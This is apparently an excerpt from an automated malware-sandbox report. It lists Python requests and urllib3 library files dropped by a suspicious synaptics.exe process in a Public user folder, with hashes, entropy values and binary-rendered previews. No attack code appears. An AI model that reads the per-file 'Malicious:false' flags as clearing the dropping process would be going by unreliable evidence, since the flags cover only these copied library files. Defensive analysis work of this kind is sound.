                                                                                                                                                                                      Preview:o.......?..f.H.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...z.d.d.l.Z.W.n...e.y5......d.d.l.Z.Y.n.w.G.d.d...d...Z.G.d.d...d...Z.d.d...Z.d.d...Z.d.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e.j.e...Z.d.d...Z.d.d...Z.d.d...Z.d d.d...Z.d.d...Z.d.S.)!z..requests.cookies.~~~~~~~~~~~~~~~~..Compatibility code to be able to use `http.cookiejar.CookieJar` with requests...requests.utils imports from here, so be careful with imports.......N.....)...to_native_string)...Morsel..MutableMapping..cookielib..urlparse..urlunparsec....................@...s....e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.d.S.) ..MockRequesta....Wraps a `requests.Request` to mimic a `urllib2.Request`... The code in `http.cookiejar.CookieJar` expects this interface in order to correctly. manage cookie policies, i.e., determine whether a cookie can be set, given the. domains of th
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6197
                                                                                                                                                                                      Entropy (8bit):4.921771915371752
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:KIrpcOB6P/5IldtEEJiCr6dNtQlrnlGkh98RZR1YgvOHwXx:frpwxIlv/JPr6OgH2Qh
                                                                                                                                                                                      MD5:AAF6B3115D9B4FD37A3BF9278B05A461
                                                                                                                                                                                      SHA1:C16733B7E19A3CAEBFBED19291BDF9AD6A2EBA01
                                                                                                                                                                                      SHA-256:40A1AC99656A83B9451C232700DF3DCEF747EC78B3A4C79AC0181228C598C861
                                                                                                                                                                                      SHA-512:9C5C0171F8EF75D68DCB79EE26C71858617F842E0F11C719A95E7C09E5FF6D5F29FEDE816351B3E7DC70AFADC66D32E31C7114361A30AADC6873D316D702A30A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..f.........................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d ..d e.e...Z.G.d!d"..d"e.e...Z.G.d#d$..d$e.e...Z.G.d%d&..d&e...Z.G.d'd(..d(e...Z.G.d)d*..d*e.e...Z.G.d+d,..d,e.e...Z.G.d-d...d.e...Z.G.d/d0..d0e...Z.G.d1d2..d2e...Z.G.d3d4..d4e.e ..Z!G.d5d6..d6e...Z"d7S.)8z`.requests.exceptions.~~~~~~~~~~~~~~~~~~~..This module contains the set of Requests' exceptions.......)...HTTPError.....)...JSONDecodeErrorc........................s ...e.Z.d.Z.d.Z...f.d.d...Z.....Z.S.)...RequestExceptionzTThere was an ambiguous exception that occurred while handling your. request.. c........................sX...|...d.d...}.|.|._.|...d.d...|._.|.d.u.r!|.j.s!t.|.d...r!|.j.j.|._.t...j.|.i.|.......d.S.).zBInitialize RequestException with `request` and `response` objects...resp
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):962
                                                                                                                                                                                      Entropy (8bit):5.240557336257205
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:tgSx1qlJ5pMUqTDP/+/k+VmY+qnvWZ3b1e7N:tuRyDPGEYxS3bUx
                                                                                                                                                                                      MD5:C0B11482D2ABEABCF2BE6C42973C490C
                                                                                                                                                                                      SHA1:616AD5EF2B62D0EF74515743430261C3F498ABD7
                                                                                                                                                                                      SHA-256:04549BD27DCD27DDDAA13004959E1D6CCD7FA2A39C5EB34E71CF67D18B85DE9C
                                                                                                                                                                                      SHA-512:C58F45C981347748192C958878BB8D03BEF466E5FE5F036E7A10EB0281181445204209FC8053BAE5DFFD8A1933FAA36B927BC79953898FDF71444EC7B0F70265
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..f.........................@...s....d.Z.d.g.Z.d.d...Z.d.d...Z.d.S.).z..requests.hooks.~~~~~~~~~~~~~~..This module provides the capabilities for the Requests hooks system...Available hooks:..``response``:. The response generated from a Request....responsec....................C...s....d.d...t.D...S.).Nc....................S...s....i.|.].}.|.g...q.S...r....)....0..eventr....r.....@C:\Users\Public\QExvbmVOb25l\lib\site-packages\requests\hooks.py..<dictcomp>....s......z!default_hooks.<locals>.<dictcomp>)...HOOKSr....r....r....r......default_hooks....s......r....c....................K...sP...|.p.i.}.|...|...}.|.r&t.|.d...r.|.g.}.|.D.].}.|.|.f.i.|.....}.|.d.u.r%|.}.q.|.S.).z6Dispatches a hook dictionary on a given piece of data...__call__N)...get..hasattr)...key..hooksZ.hook_data..kwargs..hookZ._hook_datar....r....r......dispatch_hook....s..........................r....N)...__doc__r....r....r....r....r....r....r......<module>....s............
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):24184
                                                                                                                                                                                      Entropy (8bit):5.464359982385349
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:+34ngR7uY/Gf9b7UxmzVmwYB984Z2YbwFkeeiZIuWEKbXN7:+3t6Y/GpKmzVmVB9tZ2YbwFeQgEKbXN7
                                                                                                                                                                                      MD5:C9C606E464478D11F82893E4A61B0EC6
                                                                                                                                                                                      SHA1:14E284FECC214D67E211AF6A2707B88EE714C6B6
                                                                                                                                                                                      SHA-256:E0632E8135612EAE8FF9CFA0068468549FEA2443B1C481662E1671BF4CC97302
                                                                                                                                                                                      SHA-512:034BF5E4199357249B97F90A81A0BF542FFC0823E70AA988992626C994CA2FD55D21D3CECD4B33ADCE3FEEBE3D149B8EEFD1DF43E7709174B9515CD70843ECA5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..fZ........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z ..d.d.l.m!Z!m"Z"m#Z#..d.d.l$m%Z%m&Z&m'Z'..d.d.l(m)Z)m*Z*m+Z+m,Z,m-Z-m.Z...d.d.l(m.Z/..d.d.l(m0Z0..d.d.l(m.Z1..d.d.l(m2Z2..d.d.l3m4Z4..d.d.l5m6Z6..d.d.l7m8Z8..d.d.l9m:Z:m;Z;m<Z<m=Z=m>Z>m?Z?m@Z@mAZAmBZBmCZC..e6jDe6jEe6jFe6jGe6jHf.ZId.ZJd.ZKd.ZLG.d.d...d...ZMG.d.d...d...ZNG.d.d ..d eN..ZOG.d!d"..d"eMeN..ZPG.d#d$..d$..ZQd.S.)%z`.requests.models.~~~~~~~~~~~~~~~..This module contains the primary objects that power Requests.......N)...UnsupportedOperation)...DecodeError..LocationParseError..ProtocolError..ReadTimeoutError..SSLError)...RequestField)...encode_multipart_formdata)...parse_url.....)...to_native_string..unicode_is_ascii)...HTTPBasicAuth)...Callable..JSONDecodeError..Mapping..basestring..builtin_str..chardet..cookielib)...json)...urlencode..urlsplit..urlunparse)..._copy_
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):599
                                                                                                                                                                                      Entropy (8bit):5.47645396399439
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:CAcGzQ2Z1N6EzEq+sH5MWR6hxtRHV/bCJHRi/uelmXifqI0I9IGm+l7RhCUV/X:tdwnq+sHIztRERi/uAfz3pmuVhCmX
                                                                                                                                                                                      MD5:FC966030A7AB0E4C2E3112953C0F6F46
                                                                                                                                                                                      SHA1:261CE9108202CBFA012E83D3134FC5429A44F25B
                                                                                                                                                                                      SHA-256:ADE0465D688314862E7D54343F9B3CA9E18DC826B36A32F73E29626F59E6BD2D
                                                                                                                                                                                      SHA-512:578F7F9E4AF0939622275885C177876899BDCDE530A09EF5B6F43DC1EA0C94211745437B8CF1B2467409E14AA655DDCD7BC800758589FDD1F1A64826E469B93F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..f.........................@...s....d.d.l.Z.d.d.l.m.Z...d.D.](Z.e.e...e...e.<.e.e.j...D.].Z.e.e.k.s(e...e...d.....r3e.j.e...e.j.d.e.....<.q.q.e.d.u.rke.j.Z.e.e.j...D.]+Z.e.e.k.sOe...e...d.....rje.j.e...Z.e.e.j.d.e.....<.e...e.d...Z.e.e.j.d.e.....<.qAd.S.d.S.)......N.....)...chardet)...urllib3..idna...z.requests.packages.r....)...sys..compatr......package..__import__..locals..list..modules..mod..startswith..__name__..targetZ.imported_mod..replace..r....r.....CC:\Users\Public\QExvbmVOb25l\lib\site-packages\requests\packages.py..<module>....s(...........................................
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):19692
                                                                                                                                                                                      Entropy (8bit):5.466593235194196
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:rKLx6UqoGz2kdHyVf6jLBvYANUwZaBk2bNHn8Qq:OFlGFHRjW2c/n8b
                                                                                                                                                                                      MD5:5970B41FF89E4C116D216E401A439DC6
                                                                                                                                                                                      SHA1:243DF8815E3859840F096406B7EF7216B284CE80
                                                                                                                                                                                      SHA-256:824A1D830ABFDE80DB0D53F7FF09F6873CC85B21E2D08CEFEEBE038AFFA4982D
                                                                                                                                                                                      SHA-512:F0845AE668D2570A7516FD7A137B2CC4CDB88E6F8D9B7F77F1D0A7CB7D44267FD1EBCA1ECF35CFD477189A3D1206F50A0B81F1711C64E0518F8270CC410BF58A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..f.w.......................@...sj...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l m!Z!m"Z"m#Z#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*m+Z+m,Z,m-Z-m.Z.m/Z/m0Z0m1Z1m2Z2m3Z3..e.j4d.k.r.e.j5Z6n.e.j.Z6e.f.d.d...Z7e.f.d.d...Z8G.d.d...d...Z9G.d.d...d.e9..Z:d.d...Z;d.S.).z..requests.sessions.~~~~~~~~~~~~~~~~~..This module provides a Session object to manage and persist settings across.requests (cookies, auth, proxies).......N)...OrderedDict)...timedelta.....)...to_native_string)...HTTPAdapter)..._basic_auth_str)...Mapping..cookielib..urljoin..urlparse)...RequestsCookieJar..cookiejar_from_dict..extract_cookies_to_jar..merge_cookies)...ChunkedEncodingError..ContentDecodingError..InvalidSchema..TooManyRedirects)...default_hooks..dispatch_hook)...DEFAULT_REDIRECT_LIMIT..REDIRECT_STATI..PreparedRequest..Request)...codes)...CaseInsensitiveDict)...DEFAULT_P
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4712
                                                                                                                                                                                      Entropy (8bit):5.738145194782349
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:m+vEE3B8QaXQ/aMZaSUp8DuaiCSu6woOXRAdeMO2F4K1r7w:mWn3WKfr/piTNg+eUFs
                                                                                                                                                                                      MD5:C9B79415EDC3407735BD190C822E7AA8
                                                                                                                                                                                      SHA1:3DDC6141DF9B6DDEBE405F6827D36FDD590565B4
                                                                                                                                                                                      SHA-256:20644D576B7DE439DA6141B6E17E4601D37EF335D6BD2C8584565B320F9B8FCC
                                                                                                                                                                                      SHA-512:CF264312DB520424C9DD95B1D22EE13D1917C36006F731EDB1E4B1E98590D2FAA72101799D91889770B427CFAE98582C5A3DE4FE249558E3699F8AA2BFDE35AD
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..f.........................@...s....d.a.d.d.l.m.Z...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d ..d!d"..d#d$..i.d%d&..d'd(..d)d*..d+d,..d-d...d/d0..d1d2..d3d4..d5d6..d7d8..d9d:..d;d<..d=d>..d?d@..dAdB..dCdD..dEdF....i.dGdH..dIdJ..dKdL..dMdN..dOdP..dQdR..dSdT..dUdV..dWdX..dYdZ..d[d\..d]d^..d_d`..dadb..dcdd..dedf..dgdh....i.didj..dkdl..dmdn..dodp..dqdr..dsdt..dudv..dwdx..dydz..d{d|..d}d~..d.d...d.d...d.d...d.d...d.d...d.d.....Z.e.d.d...Z.d.d...Z.e.....d.S.).a.....The ``codes`` object defines a mapping from common names for HTTP statuses.to their numerical codes, accessible either as attributes or as dictionary.items...Example::.. >>> import requests. >>> requests.codes['temporary_redirect']. 307. >>> requests.codes.teapot. 418. >>> requests.codes['\o/']. 200..Some codes have multiple names, and both upper- and lower-case versions of.the names are allowed. For example, ``codes.ok``, ``codes.OK``, and.``codes.okay
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4406
                                                                                                                                                                                      Entropy (8bit):5.100867179309283
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:2VEvJgabXXYS+hwKMGZG3h+VLTovFx0qjax7evl:2UJrbXX3wtEhL39
                                                                                                                                                                                      MD5:A4250A667A125606DED27316DB2877A6
                                                                                                                                                                                      SHA1:013244A2ECAC89AC5E829833A2D92901ECE016A0
                                                                                                                                                                                      SHA-256:3DE411CCF88C8881092361887C7D2D5BE02208FFE78674E0200873111513D9CF
                                                                                                                                                                                      SHA-512:CD1C923644D1E6D17B646BC1B36237D0FBC7BADAD5098428E4EB4CB18FC302A084F4FA1226FD039AC56DFD955D42648F7411DAA343362BF85247A2223BE958F4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..f`........................@...sD...d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).zO.requests.structures.~~~~~~~~~~~~~~~~~~~..Data structures that power Requests.......)...OrderedDict.....)...Mapping..MutableMappingc....................@...sb...e.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...CaseInsensitiveDicta....A case-insensitive ``dict``-like object... Implements all methods and operations of. ``MutableMapping`` as well as dict's ``copy``. Also. provides ``lower_items``... All keys are expected to be strings. The structure remembers the. case of the last key to be set, and ``iter(instance)``,. ``keys()``, ``items()``, ``iterkeys()``, and ``iteritems()``. will contain case-sensitive keys. However, querying and contains. testing is case insensitive::.. cid = CaseInsensitiveDict(). cid['Accept'] = 'application/json'. cid['aCCEPT'] == 'application/json'
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):24594
                                                                                                                                                                                      Entropy (8bit):5.589357337041435
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:dwAXYudd5j1OCC04lbTaUGMAuAWtNNMAMFFOCTGvq2iqkg+p/cdiGjYrUcszdvLk:dR/54lPaQxA2usCTGGZcdzTR5vLk
                                                                                                                                                                                      MD5:B3581C6AACFA935ECAFA3F8A7C3471AD
                                                                                                                                                                                      SHA1:22CFA4AF247A72FF4E844B5E67974B797860B3EB
                                                                                                                                                                                      SHA-256:5B5818E66E943541159FBD870F6EC21E5843344EBB0F217C54BB0D4F64E71421
                                                                                                                                                                                      SHA-512:FA38E8ABA87BD1810AB548E469C7AFEE62DB44B5DE1FDB876513448D335FE3F51C851806DAEE0495F0E13A76C2839B46857744A706CE2CAAAD5E1ED67CEDFB44
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..fS........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m Z!..d.d.l.m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,m-Z-m.Z.m/Z/..d.d.l0m1Z1..d.Z2e..3..Z4d.d.d...Z5d..6e..7d.e.d.d...d.......Z8e.j9d.k.r.d.d...Z:d.d...Z"d.d...Z;d.d ..Z<dtd"d#..Z=d$d%..Z>d&d'..Z?e.j@d(d)....ZAd*d+..ZBd,d-..ZCd.d/..ZDd0d1..ZEdtd2d3..ZFd4d5..ZGd6d7..ZHd8d9..ZId:d;..ZJd<d=..ZKd>d?..ZLd@dA..ZMdBdC..ZNeOdD..ZPdEdF..ZQdGdH..ZRdIdJ..ZSdKdL..ZTdMdN..ZUdOdP..ZVe.j@dQdR....ZWdSdT..ZXdudUdV..ZYdWdX..ZZdvdYdZ..Z[dwd\d]..Z\d^d_..Z]d`da..Z^db._dc..Z`e`dd..Zae`de..Zbdfdg..Zcdhdi..Zddjdk..Zedldm..Zfdndo..Zgdpdq..Zhdrds..Zid.S.)xz..requests.utils.~~~~~~~~~~~~~~..This module provides utility functions that are used within Requests.that are also useful for external consumption.......N)...OrderedDict)...make_headers..parse_url..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):435
                                                                                                                                                                                      Entropy (8bit):4.9265723482231465
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:PbfvK6kUFu7/svSNXBxSu6AbzuEFhCH3RX0T:Tfvqcq/svSTxSu6Av+3RX0T
                                                                                                                                                                                      MD5:CF7B49D0B713B70F100F710CFD501EF4
                                                                                                                                                                                      SHA1:C4D5E1C3654E68DBEF42E721F0B77CC6CDF50D75
                                                                                                                                                                                      SHA-256:1557E09606663509E660F5E93A8843539F05E4451BFFE5674936807AC4B5F3B8
                                                                                                                                                                                      SHA-512:ABFBD374D94DF3DAD2B9F5D31301E373703F3452F2C10D1ECAE5EA4C8802A96129162E125E29BBE39A18F0A7D80841886E9A5E1A2CFF51EC5238171AEE6F726D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# .-. .-. .-. . . .-. .-. .-. .-..# |( |- |.| | | |- `-. | `-..# ' ' `-' `-`.`-' `-' `-' ' `-'..__title__ = "requests".__description__ = "Python HTTP for Humans.".__url__ = "https://requests.readthedocs.io".__version__ = "2.32.3".__build__ = 0x023203.__author__ = "Kenneth Reitz".__author_email__ = "me@kennethreitz.org".__license__ = "Apache-2.0".__copyright__ = "Copyright Kenneth Reitz".__cake__ = "\u2728 \U0001f370 \u2728".
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6979
                                                                                                                                                                                      Entropy (8bit):4.826414206670692
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:P9QAikSuWD/Tsos7HsKOIlwU2oAkVHW0nFp+Gsn1sx2ns6O1R7RlcLJCuhvPFor9:V1SnTtuVHW0nYO1PCFCuh8xRf1
                                                                                                                                                                                      MD5:4877CC4151D65B254317F34DDD8EF09E
                                                                                                                                                                                      SHA1:E5664A19D6EF51317AD3F18DFF841833B34F9EB9
                                                                                                                                                                                      SHA-256:24CA35B60D67215D40789DAF10D0BF4F17E5D1EE61E86CE5F43195935AD645BA
                                                                                                                                                                                      SHA-512:C15E5BD7EFB60C4306B5FE068437BA1938003A0F2B8E0E44CCF773CE6FBE12870252297C18D9FCD1DC315141DC1ED8406BC4A01F2CEA99FC250A685647813912
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""".Python HTTP library with thread-safe connection pooling, file post support, user friendly, and more."""..from __future__ import annotations..# Set default logging handler to avoid "No handler found" warnings..import logging.import sys.import typing.import warnings.from logging import NullHandler..from . import exceptions.from ._base_connection import _TYPE_BODY.from ._collections import HTTPHeaderDict.from ._version import __version__.from .connectionpool import HTTPConnectionPool, HTTPSConnectionPool, connection_from_url.from .filepost import _TYPE_FIELDS, encode_multipart_formdata.from .poolmanager import PoolManager, ProxyManager, proxy_from_url.from .response import BaseHTTPResponse, HTTPResponse.from .util.request import make_headers.from .util.retry import Retry.from .util.timeout import Timeout..# Ensure that Python is compiled with OpenSSL 1.1.1+.# If the 'ssl' module isn't available at all that's.# fine, we only care if the module is available..try:. import ssl.except I
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6094
                                                                                                                                                                                      Entropy (8bit):5.51245559135819
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:h/KVMbgcD9Q0jnBw/lM2oAH7KR2RPRlcLJCuhvPFor70S1lDhzQwePa/vpy6hqbh:4VIgchjjneTXCFCuh8NlBTePE4RrH
                                                                                                                                                                                      MD5:06D124B2BCF6CDFD866322D184CA9235
                                                                                                                                                                                      SHA1:AEE384D25509155E23332AD0324AAFB99601C73D
                                                                                                                                                                                      SHA-256:CBA6121AA3324F3F161131724B8B6803C14DE5C5420E6F1234E853E462918D1F
                                                                                                                                                                                      SHA-512:5FEA5AC6E9E185B7FA73A150D8D3A1E1EE6AA08DE3E964A93AA2F745E48ED960E08E91E006608A4D014E09F2C6A7B5097C7A1B1AE9AC3ACAADF21F91E583AD25
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..fC........................@...s....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..z.d.d.l$Z$W.n...e%y{......Y.n"w.e$j&.'d...s.e..(d.e$j&..d...e.j)....n.e$j*d.k.r.e%d.e$j&..d.......d.Z+d.Z,e.Z.d.Z-e...e/...0e.......e.j1f.dBd.d...Z2[.e.j3d.e.j4d d!....e.j3d"e.j5d d!....e.j6f.dCd&d'..Z7e...Z8d.d.d.d d d d.d(d.d)..dDd>d?..Z9e.j:d@k.r.d.dAl;m<Z<..e<....d.S.d.S.)Eze.Python HTTP library with thread-safe connection pooling, file post support, user friendly, and more......)...annotationsN)...NullHandler.....)...exceptions)..._TYPE_BODY)...HTTPHeaderDict)...__version__)...HTTPConnectionPool..HTTPSConnectionPool..connection_from_url)..._TYPE_FIELDS..encode_multipart_formdata)...PoolManager..ProxyManager..proxy_from_url)...BaseHTTPResponse..HTTPResponse)...make_headers)...Retry)...Timeoutz.OpenSSL zUurllib3 v2 only suppo
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5669
                                                                                                                                                                                      Entropy (8bit):5.123098275388025
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:+c/rlSd/T49ElnxsGaqlYrxg5BLYrrN/jFV/5/iWb01GJwIGdP2vI5PAv/Atd2Nq:7zlSd/89El98SGrpn5/iWb01GJBvI5Px
                                                                                                                                                                                      MD5:D04B6BAC4F22581ADCE04C94A77E3CB0
                                                                                                                                                                                      SHA1:5C2D27A8E2EB461FD5FB3A6685D68602A4D16E8F
                                                                                                                                                                                      SHA-256:86E8FA998CD4174BC867C67A48F12C1BCF072A69D35A463BF7B3A759A01D3F88
                                                                                                                                                                                      SHA-512:B4D7A7CEDB1D604181526FCF0451CD5D413568BAA3870974EAA74B6E38ACCC17A1C75BBA29F9B3D51C9DEF4D8DEA7A857BFD3E794A6CEFF0463673A306D5CE54
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f.........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.j.e.e.j.e.j...e.j.e...e.f...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.e.j.rfd.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.G.d.d...d.e.e...Z.d.S.d.S.)......)...annotationsN.....)..._TYPE_SOCKET_OPTIONS)..._DEFAULT_TIMEOUT.._TYPE_TIMEOUT)...Urlc....................@...s....e.Z.d.Z.U.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.S.)...ProxyConfig..ssl.SSLContext | None..ssl_context..boolZ.use_forwarding_for_https."None | str | typing.Literal[False]..assert_hostname..str | None..assert_fingerprintN....__name__..__module__..__qualname__..__annotations__..r....r.....JC:\Users\Public\QExvbmVOb25l\lib\site-packages\urllib3\_base_connection.pyr........s..............r....c....................@...s6...e.Z.d.Z.U.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.S.)..._ResponseOptions..strZ.request_methodZ.request_urlr......preload_content..decode_content..enforce_content_lengthNr....r....r....r....r....r........
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):16235
                                                                                                                                                                                      Entropy (8bit):5.258657499941966
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:FWFpjR4qRg8OGlm9VP0Zxfl9Zg2j142c84ll4OERj4T/gW9lYyscf:Maf8O4m9VPaxfS2Sl4ORTvNso
                                                                                                                                                                                      MD5:DE0E15935FEF3DE114FD33BA4C53C74F
                                                                                                                                                                                      SHA1:88558EFF98F1B3F71372E3F5FC4156C1076C6116
                                                                                                                                                                                      SHA-256:CF6EA84C1AF8BEAB4CF62076D1738FC05267E5DC54AEE2454BC029540A2981C2
                                                                                                                                                                                      SHA-512:714CE3E1E7638A7B1695097E2F3B49B9A2CC4E9A9503F79873F339FFD437625A9F9DC47CE2B9805D3C8EAA8F9F3E329C2AC43B75588A26790D634ABFDFBA8C5C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
